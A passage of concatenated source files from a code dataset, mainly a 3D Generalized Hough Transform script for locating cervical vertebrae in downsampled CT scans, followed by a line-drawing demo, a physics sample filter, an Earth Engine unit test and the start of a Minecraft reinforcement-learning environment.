scipy.ndimage.filters import sobel\nfrom mpl_toolkits.mplot3d import Axes3D\nimport cv2 as cv\nfrom scipy import signal\nfrom scipy.ndimage.filters import gaussian_filter\nimport datetime\nimport openpyxl\nimport random\nimport cython\nfrom multiprocessing import Pool\n\ntry:\n import cPickle\nexcept ImportError:\n import pickle as cPickle\n\n\ndef gradient_orientation(image):\n '''\n Calculate the gradient orientation for edge point in the image\n '''\n #scipy.ndimage.sobel\n dx = sobel(image, axis=0, mode='constant')\t\n dy = sobel(image, axis=1, mode='constant')\n dz = sobel(image, axis=1, mode='constant')\n \n #For 3D instead of a single gradient value, we need two angles that define a normal vector\n #Phi is the angle between the positive x-axis to the projection of the normal vector the x-y plane (around +z)\n #Psi is the angle between the positive z-axis to the normal vector\n \n phi = np.arctan2(dy ,dx) * 180 / np.pi\n psi = np.arctan2(np.sqrt(dx*dx + dy*dy), dz) * 180 / np.pi\n \n\n gradient = np.zeros(image.shape)\n \n return phi, psi\n\ndef build_r_table(image, origin):\n '''\n Build the R-table from the given shape image and a reference point\n '''\n edges = canny_edges_3d(image)\n \n #Takes (47,40) Edges and calculates the gradients using sobel\n phi, psi = gradient_orientation(edges)\n #print(\"Phi Dim: \", phi.shape)\n \n r_table = defaultdict(list)\n for (i,j,k),value in np.ndenumerate(edges):\n if value:\n r_table[(int(phi[i,j,k]),int(psi[i,j,k]))].append((origin[0]-i, origin[1]-j, origin[2] - k))\n \n \n return r_table\n\ndef canny_edges_3d(grayImage):\n dim = np.shape(grayImage)\n \n edges_x = np.zeros(grayImage.shape, dtype=bool) \n edges_y = np.zeros(grayImage.shape, dtype=bool) \n edges_z = np.zeros(grayImage.shape, dtype=bool) \n edges = np.zeros(grayImage.shape, dtype=bool) \n \n\n for i in range(dim[0]):\n edges_x[i,:,:] = canny(grayImage[i,:,:], low_threshold=MIN_CANNY_THRESHOLD, high_threshold=MAX_CANNY_THRESHOLD, sigma = std_dev_canny)\n \n for j in range(dim[1]):\n edges_y[:,j,:] = canny(grayImage[:,j,:], low_threshold=MIN_CANNY_THRESHOLD, high_threshold=MAX_CANNY_THRESHOLD, sigma = std_dev_canny)\n \n for k in range(dim[2]):\n edges_z[:,:,k] = canny(grayImage[:,:,k], low_threshold=MIN_CANNY_THRESHOLD, high_threshold=MAX_CANNY_THRESHOLD, sigma = std_dev_canny)\n \n \n for i in range(dim[0]):\n for j in range(dim[1]):\n for k in range(dim[2]):\n #edges[i,j,k] = (edges_x[i,j,k] and edges_y[i,j,k]) or (edges_x[i,j,k] and edges_z[i,j,k]) or (edges_y[i,j,k] and edges_z[i,j,k])\n edges[i,j,k] = (edges_x[i,j,k]) or (edges_y[i,j,k]) or (edges_z[i,j,k])\n \n \n return edges\n\n#grayImage is queryImage\ndef accumulate_gradients(r_table, grayImage):\n '''\n Perform a General Hough Transform with the given image and R-table\n '''\n \n #Get edges matrix from Canny \n edges = canny_edges_3d(grayImage) \n \n #Get gradient angles\n phi, psi = gradient_orientation(edges)\n \n accumulator = np.zeros(grayImage.shape)\n #int accum_i\n accum_i = 0\n accum_j = 0 \n accum_k = 0\n\n edges_dim = np.shape(edges)\n\n print(datetime.datetime.now())\n \n \n for (i,j,k),value in np.ndenumerate(edges):\n if value: \n for r in r_table[(int(phi[i,j,k]), int(psi[i,j,k]))]:\n #iterations = iterations + 1\n accum_i, accum_j, accum_k = i+r[0], j+r[1], k+r[2]\n if accum_i < accumulator.shape[0] and accum_j < accumulator.shape[1] and accum_k < accumulator.shape[2]:\n accumulator[int(accum_i), int(accum_j), int(accum_k)] += 1 \n \n \n print(datetime.datetime.now()) \n \n #Approximately 400-550k iterations\n #print(\"Number of Iterations in Accumulate Gradients: \", iterations)\n\n return accumulator\n\ndef general_hough_closure(reference_image):\n '''\n Generator function to create a closure with the reference image and origin\n at the center of the reference image\n \n Returns a function f, which takes a query image and returns the accumulator\n '''\n \n referencePoint = (reference_image.shape[0]/2, reference_image.shape[1]/2, reference_image.shape[2]/2)\n \n #print(\"Reference Point: \", referencePoint)\n \n r_table = build_r_table(reference_image, referencePoint)\n \n def f(query_image):\n return accumulate_gradients(r_table, query_image)\n \n return f\n\ndef n_max(a, n):\n '''\n Return the N max elements and indices in a\n '''\n indices = (-a.ravel()).argsort()[:n]\n indices = (np.unravel_index(i, a.shape) for i in indices)\n return [(a[i], i) for i in indices]\n \ndef test_general_hough(gh, reference_image, query):\n '''\n Uses a GH closure to detect shapes in an image and create nice output\n '''\n #query_image = imread(query, flatten=True)\n query_image = query\n query_dim = np.shape(query)\n reference_dim = np.shape(reference_image)\n\n accumulator = gh(query_image)\n\n return accumulator\n\n\n#===================================================================================================\n#****************************************** START OF GHT *******************************************\n#===================================================================================================\ndef GHT(ac_num):\n#===================================================================================================\n#Obtaining the list of references to use and bounding the Region of Interest\n#===================================================================================================\n #Get the references that will be used for Cervical Spine Vertebrae Detection\n reference_acs = []\n\n image_file_name = ac_num + \"_accumulator_sigma_\" + str(std_dev) + \"_edge_sigma_\" + str(std_dev_edges) + \"_canny_sigma_\" + str(std_dev_canny) + \"_min_canny_\" + str(MIN_CANNY_THRESHOLD) + \"_max_canny_\" + str(MAX_CANNY_THRESHOLD)\n\n for file_name in os.listdir(\"no_fractures\"):\n #The name should have \"reference\" in it but no \"edge\" in it\n if file_name.find(\"reference.pkl\") != -1 and file_name.find(\"edge\") == -1:\n #The reference list should not include the reference from the current ac_num\n if file_name.find(str(ac_num)) == -1:\n reference_acs.append(file_name)\n \n print(\"Accession Number: \", ac_num)\n \n \n #Open Downsized Pickle File Containing DICOM Scan\n try:\n dicom_dwn4x_pp = cPickle.load(open(\"no_fractures/dicom_3d_\" + ac_num + \"_dwn4x.pkl\",\"rb\"),encoding = 'latin1')\n except:\n dicom_dwn4x_pp = cPickle.load(open(\"no_fractures/dicom_3d_\" + ac_num + \"_dwn4x.pkl\",\"rb\"))\n dicom_dwn4x_pp_dim = np.shape(dicom_dwn4x_pp)\n print(\"Size of Downsized Dicom Input: \", dicom_dwn4x_pp_dim)\n\n#**************************************************************************************************************************\n #Specify Region of Interest (Hard Blocking of Region Based on Prior Information)\n x1 = 0\n x2 = 58\n y1 = 17\n y2 = 85\n#**************************************************************************************************************************\n\n \n #Get specific region of focus (based on prior information)\n dicom_dwn4x = dicom_dwn4x_pp[x1:x2,y1:y2,:] #dicom_dwn4x contains the specific region of focus\n dicom_dwn4x_dim = np.shape(dicom_dwn4x)\n print(\"Size of Relevant Dicom (Prior Info): \", dicom_dwn4x_dim)\n \n\n#===================================================================================================\n#Obtain Final Accumulator Matrix through Max-Pooling of Individual Accumulator Matrices\n#===================================================================================================\n #Initialize Accumulator that will be used to get top points\n accumulator = np.zeros(dicom_dwn4x_dim)\n \n \n #Choose N number of references\n #random_reference_acs = []\n random_reference_acs = reference_acs[0:5]\n\n \n #while len(random_reference_acs) < 5: \n # index = random.randint(0,len(reference_acs)-1)\n \n # if reference_acs[index] not in random_reference_acs:\n # random_reference_acs.append(reference_acs[index])\n \n for reference_ac in random_reference_acs:\n print(\"Current Reference: \", reference_ac)\n \n #Open up the Reference that is used as the reference image\n try:\n reference = cPickle.load(open(\"no_fractures/\" + reference_ac,\"rb\"),encoding = 'latin1')\n except:\n reference = cPickle.load(open(\"no_fractures/\" + reference_ac,\"rb\"))\n #print(\"Size of Reference Image: \", np.shape(reference))\n\n detect_s = general_hough_closure(reference)\n \n #Use max pooling on accumulator matrix\n temp_accumulator = test_general_hough(detect_s, reference, dicom_dwn4x)\n \n accumulator = np.maximum(accumulator,temp_accumulator)\n \n final_accumulator = accumulator\n \n \n #The final accumulator is the likelihood of the detection point being somewhere.\n #The prior is the function function: prior = (1 - (x-29)^4/29^4 - (y-51)^4/34^4)^1/4\n final_ac_dim = np.shape(final_accumulator)\n prior = np.zeros((final_ac_dim[0],final_ac_dim[1]))\n \n #print(final_ac_dim)\n \n #Using Prior Distribution (about average centre of Ground Truth Points)\n pwr = 4\n \n for dim1 in range(final_ac_dim[0]):\n for dim2 in range(final_ac_dim[1]):\n if (float(dim1-29)/29)**pwr + (float(dim2 - 34)/34)**pwr <= 1:\n prior[dim1][dim2] = math.pow(1 - float(dim1 - 29)/29**pwr - float(dim2 - 34)/34**pwr,math.pow(pwr,-1))\n #print(math.pow(1 - (float(dim1 - 29)/29)**pwr - (float(dim2 - 34)/34)**pwr,math.pow(pwr,-1)))\n #print(prior[dim1][dim2])\n \n\n #print(np.shape(prior))\n\n for dim3 in range(final_ac_dim[2]):\n final_accumulator[:,:,dim3] = np.multiply(final_accumulator[:,:,dim3],prior)\n \n \n \n#===================================================================================================\n#Blurring the Accumulator Matrix and Query Edge Image\n#===================================================================================================\n #Blur the final accumulator matrix\n final_accumulator = gaussian_filter(final_accumulator,sigma = std_dev, order = 0)\n\n #Blur the edge image for the whole dwn4x\n query_edges = canny_edges_3d(dicom_dwn4x_pp)\n\n query_edges_dim = np.shape(query_edges)\n \n query_edges_blurred = gaussian_filter(np.multiply(query_edges,50),sigma = std_dev_edges, order = 0)\n\n\n#===================================================================================================\n#Initial Plots and Top 40 Points for Visualization Purposes\n#===================================================================================================\n plot_z = ground_truth[ac_num][2]\n\n #Plot up to top 40 points\n fig = plt.figure(num = image_file_name, figsize = (24,12))\n plt.gray()\n\n fig.suptitle(image_file_name)\n\n fig.add_subplot(2,4,1)\n plt.title('Query Image [Slice: ' + str(plot_z) + ']')\n #plt.imshow(dicom_dwn4x_pp[:,:,dicom_dwn4x_pp_dim[2]//2])\n plt.imshow(dicom_dwn4x_pp[:,:,plot_z])\n \n fig.add_subplot(2,4,2)\n plt.title('Query Image Edges')\n #plt.imshow(query_edges[:,:,dicom_dwn4x_pp_dim[2]//2])\n plt.imshow(query_edges[:,:,plot_z])\n \n fig.add_subplot(2,4,3)\n plt.title('Query Image Edges Blurred')\n #plt.imshow(query_edges_blurred[:,:,dicom_dwn4x_pp_dim[2]//2])\n plt.imshow(query_edges_blurred[:,:,plot_z])\n \n fig.add_subplot(2,4,4)\n plt.title('Final Accumulator')\n #plt.imshow(final_accumulator[:,:,dicom_dwn4x_dim[2]//2])\n plt.imshow(final_accumulator[:,:,plot_z])\n \n fig.add_subplot(2,4,5)\n plt.title('Detection of Top 40 Points')\n #plt.imshow(dicom_dwn4x_pp[:,:,dicom_dwn4x_dim[2]//2])\n plt.imshow(dicom_dwn4x_pp[:,:,plot_z])\n\n\n #Get top 40 results that can be filtered out\n m = n_max(final_accumulator, 40)\n\n points = []\n x_pts = [] \n y_pts = []\n z_pts = []\n \n for pt in m:\n points.append((pt[1][0] + x1,pt[1][1] + y1,pt[1][2], int(pt[0])))\n \n x_pts.append(pt[1][0]+x1)\n y_pts.append(pt[1][1]+y1) \n z_pts.append(pt[1][2])\n \n plt.scatter(y_pts,x_pts, marker='.', color='r')\n \n \n #Take the top K average \n k = 5\n k_sum_pp = np.zeros(3)\n for index in range(k):\n k_sum_pp = np.add(k_sum_pp, m[index][1])\n #print(m[index])\n \n optimal_pt = (int(k_sum_pp[0]//k) + x1,int(k_sum_pp[1]//k) + y1,int(k_sum_pp[2]//k))\n \n #print (\"Top 40 Most Likely Points (x,y,z,certainty): \", points)\n\n\n#===================================================================================================\n#Non-maximal suppression\n#===================================================================================================\n #Plot NMS points\n fig.add_subplot(2,4,6)\n plt.title('Non-Maximal Suppression and Optimal Points')\n #plt.imshow(dicom_dwn4x_pp[:,:,dicom_dwn4x_pp_dim[2]//2])\n plt.imshow(dicom_dwn4x_pp[:,:,plot_z])\n\n #Perform non-maximal suppression\n nms_pts = []\n \n for pt in points:\n if len(nms_pts) == 0:\n nms_pts.append(pt)\n else:\n counter = 0\n for i in range(len(nms_pts)):\n if math.sqrt((nms_pts[i][0]-pt[0])**2 + (nms_pts[i][1]-pt[1])**2 + (nms_pts[i][2]-pt[2])**2) > 10:\n counter = counter + 1\n else:\n if pt[3] > nms_pts[i][3]:\n nms_pts[i] = pt\n \n if counter == len(nms_pts):\n nms_pts.append(pt)\n \n print(\"Non-Maximal Suppression Points: \", nms_pts)\n \n\n#===================================================================================================\n#Normalized Cross Correlation and Heat Map Generation\n#===================================================================================================\n #Sliding reference across volume around detected points to find accurate point\n #optimal_pt = [0,0]\n max_cross_correl_val = -float('inf')\n \n heat_maps = []\n \n '''\n #Generate the edge references if they do not exist in the directory \"no_Fractures\"\n for reference_ac in random_reference_acs:\n edge_reference_name = \"no_fractures/edge_references/edge\" + \"_es\" + str(std_dev_edges) + \"_min\" + str(MIN_CANNY_THRESHOLD) + \"_max\" + str(MAX_CANNY_THRESHOLD) + \"_cs\" + str(std_dev_canny) + \"_\" + reference_ac\n \n \n \n if not os.path.isfile(edge_reference_name):\n try:\n reference_vol_pp1 = cPickle.load(open(\"no_fractures/\" + reference_ac,\"rb\"),encoding = 'latin1')\n except:\n reference_vol_pp1 = cPickle.load(open(\"no_fractures/\" + reference_ac,\"rb\"))\n \n reference_vol_pp2 = np.array(reference_vol_pp1)\n \n reference_vol_edges = canny_edges_3d(reference_vol_pp2)\n reference_vol_edges_blurred = gaussian_filter(np.multiply(reference_vol_edges,50),sigma = std_dev_edges, order = 0)\n \n cPickle.dump(reference_vol_edges_blurred, open(edge_reference_name,\"wb\"),protocol = 2)\n #print(\"no_fractures/edge_\" + reference_ac)\n \n '''\n \n '''\n #Method of removing the lowest detection point if there is more than one before doing normalized cross correlation\n if len(nms_pts) > 1:\n low_pt = nms_pts[0]\n \n for pt in nms_pts:\n if pt[0] > low_pt[0]:\n low_pt = pt\n \n nms_pts.remove(low_pt)\n '''\n \n '''\n optimal_pt = [0,0,0]\n min_xdir = float('Inf')\n \n\n for pt in nms_pts:\n if pt[0] < min_xdir:\n min_xdir = pt[0]\n optimal_pt = pt[0:3]\n ''' \n \n '''\n for pt in nms_pts:\n heat_map = np.zeros((9,9,3))\n print(\"The point being investigated is: \", pt)\n\n \n\n for i in range(-dicom_dwn4x_pp_dim[0]//32,dicom_dwn4x_pp_dim[0]//32 + 1):\n for j in range(-dicom_dwn4x_pp_dim[1]//32,dicom_dwn4x_pp_dim[1]//32 + 1):\n for k in range(-1,2):\n cross_correl_val = 0\n \n for reference_ac in random_reference_acs:\n try:\n reference_vol_pp = cPickle.load(open(edge_reference_name,\"rb\"),encoding = 'latin1')\n except:\n reference_vol_pp = cPickle.load(open(edge_reference_name,\"rb\"))\n #reference_dim is the dimension of the edge reference\n reference_dim = np.shape(reference_vol_pp)\n reference_vol = np.ndarray.flatten(reference_vol_pp)\n \n #Get bounds to compare on the query image\n x1 = pt[0] - reference_dim[0]//2 + i\n x2 = x1 + reference_dim[0]\n \n y1 = pt[1] - reference_dim[1]//2 + j\n y2 = y1 + reference_dim[1]\n \n z1 = pt[2] - reference_dim[2]//2 + k\n z2 = z1 + reference_dim[2]\n \n #Use the Canny edge version of the query image for cross correlation\n query_vol_pp = np.array(query_edges_blurred[x1:x2,y1:y2,z1:z2])\n query_vol = np.ndarray.flatten(query_vol_pp)\n \n query_dim = np.shape(query_vol_pp)\n \n #Exit current slide location if out of bounds\n if x1 < 0 or y1 < 0 or z1 < 0:\n break\n \n if x2 > query_edges_dim[0] or y2 > query_edges_dim[1] or z2 > query_edges_dim[2]:\n break\n\n #Use norms to normalize the vectors for cross-correlation\n #print(np.linalg.norm(reference_vol))\n #print(np.linalg.norm(query_vol))\n reference_vol_norm = reference_vol/np.linalg.norm(reference_vol)\n query_vol_norm = query_vol/np.linalg.norm(query_vol)\n \n \n if (np.dot(reference_vol_norm, query_vol_norm)) < 0:\n print(\"ALERT NEGATIVE DOT PRODUCT VIOLATION\")\n \n cross_correl_val = cross_correl_val + np.dot(reference_vol_norm, query_vol_norm)\n \n heat_map[i+4,j+4,k+1] = cross_correl_val\n if cross_correl_val > max_cross_correl_val:\n #print(max_cross_correl_val)\n max_cross_correl_val = cross_correl_val\n #print(\"The cross correlation value is: \", cross_correl_val)\n optimal_pt = [pt[0]+i,pt[1]+j, pt[2]+k]\n #print(\"The optimal point currently is: \", optimal_pt)\n \n \n #Append heat_map\n heat_maps.append(heat_map)\n \n #Set Detection Threshold for Specific Accession Number\n global detection_threshold\n detection_threshold = (dicom_dwn4x_pp_dim[0]//64)*(dicom_dwn4x_pp_dim[1]//64)*3\n #print(detection_threshold)\n '''\n\n print(\"The Final Detection point is: \",optimal_pt)\n\n \n #Plot non-maximal suppression points\n nms_x_pts = [] \n nms_y_pts = []\n nms_z_pts = []\n \n for pt in nms_pts:\n nms_x_pts.append(pt[0])\n nms_y_pts.append(pt[1]) \n nms_z_pts.append(pt[2]) \n\n\n plt.scatter(nms_y_pts,nms_x_pts, marker='o', color='g')\n \n plt.scatter(optimal_pt[1],optimal_pt[0], marker='X', color='m')\n \n #Put on ground truth point on NMS + Optimal Point Plot\n plt.scatter(ground_truth[ac_num][1], ground_truth[ac_num][0], marker= 'o', color = 'c')\n \n '''\n #Add plot for heat map\n for i in range(2):\n try:\n heat_map = heat_maps[i]\n heat_map_norm = heat_map\n fig.add_subplot(2,4,7+i)\n plt.title('Heat Map')\n plt.imshow(heat_map_norm[:,:,1])\n except:\n pass\n '''\n #plt.show()\n \n \n \n #Save Figure\n #print(os.getcwd())\n print(image_dir_name)\n #print(image_file_name)\n #plt.savefig(os.path.join(image_dir_name, image_file_name + \".png\"))\n #print(os.path.join(image_dir_name, image_file_name + \".png\"))\n plt.savefig(image_dir_name + \"/\" + image_file_name + \".png\")\n \n return optimal_pt\n\n#===================================================================================================\n#******************************************* END OF GHT ********************************************\n#===================================================================================================\n\n\n#===================================================================================================\n#===================================================================================================\nif __name__ == '__main__':\n #os.chdir(\"C:\\\\Users\\\\yoons\\\\Documents\\\\ESC499\\\\Undergraduate_Thesis_Scripts\\\\DicomSubsampling\")\n os.chdir(\"../DicomSubsampling\") \n\n plt.close()\n#===================================================================================================\n#Process the accession numbers that are present and put it into a list\n#===================================================================================================\n ac_nums_pp = os.listdir(\"no_fractures/\")\n ac_nums = []\n \n for ac_num_pp in ac_nums_pp:\n if \"reference\" not in ac_num_pp:\n str1 = ac_num_pp.split(\"dicom_3d_\")[1]\n str2 = str1.split(\"_\")[0]\n \n ac_nums.append(str2)\n\n#===================================================================================================\n#Read in ground truth values from the ground_truth_detection_pts.xlsx spreadsheet\n#===================================================================================================\n #Get the detection results for the validation set\n book = openpyxl.load_workbook(\"../GHT/ground_truth_detection_pts_all.xlsx\")\n sheet = book.active\n row_count = sheet.max_row\n \n global ground_truth\n ground_truth = {}\n\n for i in range(3,row_count):\n \n ac_num_loc = sheet.cell(row = i,column = 1)\n ac_num = str(ac_num_loc.value)\n \n x = sheet.cell(row = i, column = 2).value\n y = sheet.cell(row = i, column = 3).value\n z = sheet.cell(row = i, column = 4).value\n \n if (x != None) and (y != None) and (z != None):\n ground_truth[ac_num] = [x,y,z]\n \n#===================================================================================================\n#Compute Detection Points, compare with ground truth to get error and detection rate\n#===================================================================================================\n global std_dev\n global std_dev_edges\n global MIN_CANNY_THRESHOLD\n global MAX_CANNY_THRESHOLD\n global std_dev_canny\n global image_file_name\n global image_dir_name\n \n #Set Hyperparameters to be validated with validation set\n std_devs = [1.0]\n std_devs_edges = [0]\n min_cannys = [30,40,50,60]\n max_cannys = [140,160,180,200]\n\n\n std_dev_canny = 0.5\n \n for std_dev in std_devs:\n for std_dev_edges in std_devs_edges:\n for MIN_CANNY_THRESHOLD in min_cannys:\n for MAX_CANNY_THRESHOLD in max_cannys:\n error = 0\n correct_detections = 0\n incorrect_ac_num = []\n detection_pt_info = {}\n \n image_dir_name = \"accumulator_sigma_\" + str(std_dev) + \"_edge_sigma_\" + str(std_dev_edges) + \"_min_canny_\" + str(MIN_CANNY_THRESHOLD) + \"_max_canny_\" + str(MAX_CANNY_THRESHOLD)\n \n print(\"Currently on: \" + image_dir_name)\n \n if os.path.isdir(image_dir_name) != 1:\n os.mkdir(image_dir_name)\n else:\n continue\n \n\n #Get the ac_num to put into multi processing\n multi_proc_ac_num = []\n \n for ac_num in ac_nums:\n if ac_num in ground_truth.keys():\n multi_proc_ac_num.append(ac_num)\n \n print(multi_proc_ac_num)\n \n #Get optimal points through multi processing\n p = Pool(processes = 25)\n \n optimal_pts = p.map(GHT,multi_proc_ac_num)\n \n optimal_pts_dict = {}\n #Put into dictionary\n for i in range(len(multi_proc_ac_num)):\n optimal_pts_dict[multi_proc_ac_num[i]] = optimal_pts[i]\n \n print(optimal_pts_dict)\n\n #Go through GHT for the validation set\n for ac_num in ac_nums:\n if ac_num in ground_truth.keys():\n \n optimal_pt = optimal_pts_dict[ac_num]\n print(\"Detected Optimal Point: \", optimal_pt)\n print(\"Ground Truth Point: \", ground_truth[ac_num])\n \n curr_error = abs(np.linalg.norm(np.subtract(optimal_pt,ground_truth[ac_num])))**2 \n error = error + curr_error\n \n #Can adjust threshold for correct detection accordingly\n if curr_error <= 20.0:\n correct_detections = correct_detections + 1\n else:\n incorrect_ac_num.append(ac_num)\n \n #Keep record of the information\n detection_pt_info[ac_num] = [optimal_pt, ground_truth[ac_num], curr_error]\n \n plt.close()\n \n \n '''\n print(\"======================================\")\n print(\"********SUMMARY OF PERFORMANCE********\")\n print(\"======================================\")\n \n print(\"Min Canny Threshold: \", MIN_CANNY_THRESHOLD)\n print(\"Max Canny Threshold: \", MAX_CANNY_THRESHOLD)\n print(\"Sigma Canny: \", std_dev_canny)\n print(\"Sigma Accumulator: \", std_dev)\n print(\"Sigma Edges: \", std_dev_edges)\n \n print(\"The squared error for this trial on the validation set is :\", error)\n print(\"The detection rate is: \" + str(correct_detections) + \"/\" + str(len(ground_truth.keys())))\n \n print(\"The Accession Numbers for Incorrect Detections are: \", incorrect_ac_num)\n print(\"Detection Point Information: \", detection_pt_info)\n '''\n\n #Output General Information to File\n f = open(image_dir_name + \"/summary.txt\",\"w\")\n f.write(\"======================================\\n\")\n f.write(\"********SUMMARY OF PERFORMANCE********\\n\")\n f.write(\"======================================\\n\")\n f.write(\"Min Canny Threshold: %s \\n\" % str(MIN_CANNY_THRESHOLD))\n f.write(\"Max Canny Threshold: %s \\n\" % str(MAX_CANNY_THRESHOLD))\n f.write(\"Sigma Canny: %s \\n\" % str(std_dev_canny))\n f.write(\"Sigma Accumulator: %s \\n\" % str(std_dev))\n f.write(\"Sigma Edges: %s \\n\\n\" % str(std_dev_edges))\n \n f.write(\"The squared error for this trial on the validation set is: %s \\n\\n\" % str(error))\n \n f.write(\"The number of correct detections is %s\" % correct_detections)\n f.write(\"/%s \\n\\n\" % str(len(ground_truth.keys())))\n \n f.write(\"Incorrect Accession Numbers: \\n\")\n for item in incorrect_ac_num:\n f.write(\"%s \" % str(item))\n\n f.write(\"\\n\\n\")\n f.write(\"Below are the detections points: \\n\")\n for key in detection_pt_info.keys():\n f.write(\"AC Num: %s Detected Point: \" % str(key))\n \n info = detection_pt_info[key]\n f.write(\"%s Actual Point: \" % str(info[0]))\n f.write(\"%s Error: \" %str(info[1]))\n f.write(\"%s\" % info[2])\n f.write(\"\\n\")\n \n f.close()\n \n #Create Excel Spreadsheet with Detection Information\n wb = openpyxl.Workbook()\n dest_filename = '../GHT/detection_pts_trial_' + str(MIN_CANNY_THRESHOLD) + '_' + str(MAX_CANNY_THRESHOLD) + '_' + str(std_dev_canny) + '_' + str(std_dev) + '_' + str(std_dev_edges) + '.xlsx'\n\n\n ws1 = wb.active\n ws1.append(['ac_num','x','y','z'])\n for key in detection_pt_info.keys():\n detected_pt = detection_pt_info[key][0]\n row = [key,detected_pt[0],detected_pt[1],detected_pt[2]]\n\n ws1.append(row)\n wb.save(dest_filename)\n \n \n#===================================================================================================\n#===================================================================================================\n","sub_path":"GHT/3DGeneralHough_multiprocess2.py","file_name":"3DGeneralHough_multiprocess2.py","file_ext":"py","file_size_in_byte":30669,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"69020414","text":"\"\"\"\nlines_growing.py\nUse simple lines, each with two points\n\"\"\"\nimport random\nimport time\nfrom BlockW import *\nbW = BlockW()\n\nbW.slider(\"winH\", 0, 900, 2000)\nbW.slider(\"winW\", 0, 1400, 2000)\nbW.add(bW.window, size=(\"winW\", \"winH\"))\ntdly = 2 # Time between displays\nprint(\"Number of points shortened because of time limitations\")\nnpoints = 10 # Number of points to display\npoints = [] # array of points to create/display\nmaxval = 4. # Maximum (x,y,z) dimensional value\nminval = -maxval # Minimum (x,y,z) dimensional value\nfor i in range(npoints):\n xval = random.uniform(minval, maxval)\n yval = random.uniform(minval, maxval)\n zval = random.uniform(minval, maxval)\n points.append([xval,yval,zval])\n \n\nfor i in range(2, npoints+1, 1): # Loop over sub groups of all points\n for npt in range(2, i):\n for ip1 in range(0, npt-1): # First point of line\n ip2 = ip1 + 1\n pt = points[ip1]\n pt2 = points[ip2] # Second point of line\n cmd = bW.add(bW.line, bW.color(0,1,0))\n cmd.addPoint(pt[0], pt[1], pt[2])\n cmd.addPoint(pt2[0], pt2[1], pt2[2])\n print(\"display {} points\".format(i));\n bW.display()\n time.sleep(tdly)\n #bW.bExec.erase()\n \nprint(\"End of %d points\" % npoints);\n","sub_path":"BwSetupJython/lines_growing_1a.py","file_name":"lines_growing_1a.py","file_ext":"py","file_size_in_byte":1315,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"515992199","text":"from tthAnalysis.HiggsToTauTau.samples.tthAnalyzeSamples_2017 import samples_2017\n\nbdt_samples = [\n \"ttHToNonbb_M125_powheg\",\n \"ttHToNonbb_M125_powheg_ext1\",\n \"TTZJets_LO\",\n \"TTZJets_LO_ext1\",\n \"TTWJets_LO\",\n \"TTWJets_LO_ext1\",\n \"TTTo2L2Nu\",\n \"TTTo2L2Nu_PSweights\",\n \"TTToSemiLeptonic\",\n \"TTToSemiLeptonic_PSweights\",\n \"TTToHadronic\",\n \"TTToHadronic_PSweights\",\n]\n\nfor sample_name, sample_info in samples_2017.items():\n if sample_name == 'sum_events': continue\n sample_info[\"use_it\"] = sample_info[\"process_name_specific\"] in bdt_samples\n","sub_path":"python/samples/tthAnalyzeSamples_2017_BDT.py","file_name":"tthAnalyzeSamples_2017_BDT.py","file_ext":"py","file_size_in_byte":552,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"173227604","text":"import ee\nimport unittest\nfrom eemont import featurecollection\n\nee.Initialize()\n\nclass Test(unittest.TestCase):\n \"\"\"Tests for `eemont` package.\"\"\"\n \n def test_MultiPointFromQuery(self):\n \"\"\"Test the MultiPointFromQuery constructor\"\"\"\n test = ee.FeatureCollection.MultiPointFromQuery('Colombia',user_agent = 'eemon-feature-test')\n self.assertIsInstance(test, ee.featurecollection.FeatureCollection)\n \nif __name__ == '__main__':\n unittest.main()","sub_path":"tests/test_featurecollection.py","file_name":"test_featurecollection.py","file_ext":"py","file_size_in_byte":487,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"121007947","text":"try:\n from malmo import MalmoPython\nexcept:\n import MalmoPython\n import malmoutils\n\nfrom numpy.random import randint\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nimport os\nimport sys\nimport time\nimport json\nimport math\nimport pathlib\nimport gym, ray\nfrom Map_Final import OBS_SIZE, MAX_EPISODE_STEPS, Map\nfrom gym.spaces import Discrete, Box\nfrom ray.rllib.agents import ppo\n\n# Neural Network related\nimport torch\nfrom torch import nn\nimport torch.nn.functional as F\nfrom ray.rllib.models import ModelCatalog\nfrom ray.rllib.models.torch.torch_modelv2 import TorchModelV2\n\nDIAMOND_POS = []\nDESTINATION_Z = 10000\n\n\n# Neural Network Model\nclass MyModel(TorchModelV2, nn.Module):\n def __init__(self, *args, **kwargs):\n TorchModelV2.__init__(self, *args, **kwargs)\n nn.Module.__init__(self)\n\n # channle number is 4, 32 hiden channels\n self.conv1 = nn.Conv2d(4, 32, kernel_size=7, padding=3) # 32, 5, 5\n self.conv2 = nn.Conv2d(32, 32, kernel_size=7, padding=3) # 32, 5, 5\n self.conv3 = nn.Conv2d(32, 32, kernel_size=7, padding=3) # 32, 5, 5\n # 7 is the action number\n self.policy_layer = nn.Linear(32*15*15, 7)\n self.value_layer = nn.Linear(32*15*15, 1)\n\n self.value = None\n\n def forward(self, input_dict, state, seq_lens):\n x = input_dict['obs'] # BATCH, 4, 15, 15\n\n x = F.relu(self.conv1(x)) # BATCH, 32, 15, 15\n x = F.relu(self.conv2(x))\n x = F.relu(self.conv3(x))\n\n x = x.flatten(start_dim=1) # BATCH, 800\n\n policy = self.policy_layer(x) # BATCH, 7\n self.value = self.value_layer(x) # BATCH, 1\n\n return policy, state\n\n def value_function(self):\n return self.value.squeeze(1)\n\n\nclass MinecraftRunner(gym.Env):\n\n def __init__(self, env_config):\n # Static Parameters\n self.obs_size = OBS_SIZE\n self.max_episode_steps = MAX_EPISODE_STEPS\n self.log_frequency = 5\n self.action_dict = {\n 0: 'move 1', # Move forward\n 1: 'move 0',\n 2: 'turn 1', # Turn right\n 3: 'turn -1', # Turn left\n 4: 'use 1', # Start opening the gate\n 5: 'jump 1', # Start jumping\n 6: 'stop' # stop all current action\n }\n\n # Rllib Parameters\n self.action_space = Discrete(len(self.action_dict))\n self.observation_space = Box(0, 1, shape=(4, self.obs_size, self.obs_size), dtype=np.float32)\n\n # Malmo Parameters\n self.agent_host = MalmoPython.AgentHost()\n try:\n self.agent_host.parse(sys.argv)\n except RuntimeError as e:\n print('ERROR:', e)\n print(self.agent_host.getUsage())\n exit(1)\n\n self.obs = None\n self.open_gate = False\n self.jump_gate = False\n self.episode_step = 0\n self.episode_return = 0\n self.returns = []\n self.steps = []\n self.current_to_dest = DESTINATION_Z\n self.shortest_to_dest = 